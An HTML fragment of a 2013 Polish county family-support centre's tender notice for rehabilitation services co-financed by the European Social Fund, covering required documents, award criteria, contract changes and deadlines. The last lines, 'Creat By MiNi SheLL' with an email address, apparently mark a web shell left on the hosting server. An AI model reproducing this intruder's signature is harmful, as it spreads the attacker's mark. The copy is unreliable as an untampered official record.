</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)Formularz ofertowy, wypełniony i podpisany przez wykonawcę- załącznik nr 1 do SIWZ oraz pozostałe załączniki od 2 do 8 SIWZ.
b)CV osób wskazanych z zał. Nr 7.
c)Referencje z wykonanych usług.
d)Pełnomocnictwo zgodne z obowiązującymi przepisami prawa, wystawione dla osoby /osób/ upoważnionych do reprezentowania oferenta w toku postępowania o udzielenie zamówienia publicznego, o ile nie wynika ono z przedstawionych dokumentów- oryginał lub kopia potwierdzona notarialnie za zgodność z oryginałem.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Dodatkowe bezpłatne zabiegi rehabilitacyjne - 20</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość istotnej zmiany umowy w następującym zakresie:
-W przypadku, jeżeli zmiana umowy jest korzystna dla Zamawiającego;
-W przypadku wystąpienia okoliczności, których nie można było przewidzieć na etapie sporządzania, a które są niezbędne dla prawidłowej realizacji zamówienia, np. zmiana przepisów prawa dotyczących przedmiotu zamówienia;
-Wszelkie zmiany do umowy wymagają zgody obydwu stron. 
W sprawach nieuregulowanych treścią niniejszej SIWZ stosuje się przepisy ustawy Prawo zamówień publicznych oraz kodeksu Cywilnego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pcpr.losice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowe Centrum Pomocy Rodzinie
ul. Narutowicza 6
08-200 Łosice.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.04.2013 godzina 08:00, miejsce: Powiatowe Centrum Pomocy Rodzinie
ul. Narutowicza 6
08-200 Łosice.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie realizowane w ramach i Projektu  systemowego /Szansa Na Lepsze Jutro w Powiecie Łosickim/ współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com